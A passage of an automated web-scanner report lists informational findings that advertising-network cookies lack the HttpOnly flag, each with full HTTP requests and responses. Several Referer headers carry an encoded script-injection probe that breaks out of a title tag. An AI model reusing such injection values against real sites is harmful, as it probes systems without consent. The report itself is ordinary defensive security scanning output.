Set-Cookie: T_4ffd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_77ak=h0l%3Aiql%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: T_1jxt=h0h%3Aiql%3A1; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: dly2=3-lg2l18-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: hst2=3-lg2l18-1~g3hog6pegpzy~i9b~4fqb~0-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~iql~1~1-h0l~iql~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Sat, 04-Feb-2012 01:48:44 GMT; Path=/
Content-Length: 12584

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

13.110. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:08 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_1g6v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kjvx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ahzq=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_km24=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 12599

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

13.111. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:34 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_fg2y=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_73th=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h9m4=h0l%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: T_4mpe=h0h%3A86c%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dly2=3-lg2agz-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: hst2=3-lg2agz-1~ufgkw2cbr0lo~i97~4fq7~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:35 GMT; Path=/
Content-Length: 12602

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

13.112. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23663 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 21:59:55 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_4ffd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1g6v=h0l%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: T_kjvx=h0h%3A859%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dly2=3-lg2afw-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 21:59:56 GMT; Path=/
Content-Length: 12998

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_
...[SNIP]...

13.113. http://ad.trafficmp.com/a/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/js?plid=23659 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Thu, 03 Feb 2011 22:00:08 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_ahzq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_km24=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fg2y=h0l%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: T_73th=h0h%3A85m%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dly2=3-lg2ag9-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Set-Cookie: rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 22:00:09 GMT; Path=/
Content-Length: 13008

document.write('\<IFRAME SRC=\"http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC
...[SNIP]...

13.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4d1e80eb13df2; i_1=33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Fri, 04 Feb 2011 02:29:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d1e80eb13df2; expires=Mon, 07-Mar-2011 02:29:41 GMT; path=/
Set-Cookie: i_1=33:971:560:0:0:38777:1296786581:L|33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2; expires=Sun, 06-Mar-2011 02:29:41 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.115. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=582755&id=584778&id=584789&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!7!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~"; ih="b!!!!B!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!$<lRYo!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=.Sexg5_x-bh5ryLshEiqN6hm(4Y4EY; bh="b!!!$M!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!<@x!!!!#<lS<(!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!u[u!!!!#<lS<(!!utd!!!!#<lS<(!!uu)!!!!#<lS<(!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#F1H!!!!'<lS0M!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@